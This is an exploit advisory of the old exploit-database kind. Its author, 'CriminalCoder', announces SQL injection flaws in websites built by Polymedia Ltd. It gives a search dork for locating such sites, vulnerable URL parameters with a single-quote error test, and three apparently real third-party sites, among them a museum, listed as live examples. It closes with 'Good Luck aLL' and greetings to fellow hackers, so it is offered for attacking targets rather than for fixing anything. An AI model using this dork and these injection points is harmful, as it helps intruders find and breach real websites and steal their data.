Polymedia Ltd. SQL injection Vulnerability

=====================================
[+] Exploit Title : Polymedia Ltd. SQL injection Vulnerability
[+] Author : CriminalCoder
[+] Category : WebApps
[+] d0rk : "Website by Polymedia Ltd." "inurl:php?="
[+] Vendor : http://www.polymedia-bg.com/
[+] Twitter : http://twitter.com/CriminalCoder
[+] Live Contact : criminalcoder@hotmail.de
[+] Tested on : Windows XP SP3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]   Exploit:

››http://localhost/front/news_details.php?*={valid id}
››http://localhost/front/details.php?*={valid id}
››http://localhost/front/index.php?*={valid id}

Check all .php?*= mostly all vuln.. to sql-i.!

››http://localhost/front/news_details.php?*=' > {sql error}
››http://localhost/front/details.php?*= sql here

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]   Example:

››http://transfer.bg/front/details.php?prod_id=4'
››http://mpd-bg.com/front/news_details.php?id=2'
››http://www.historymuseumplovdiv.org/front/index.php?tid=10'

Good Luck aLL :)

=========greetz to===========
KnocKout ~ TechnicaL ~ NosleeP++ ~
Redd.é ~ SanaLtahriP ~ TheMirkin ~
DeadMaster ~ and all my friends...
==========================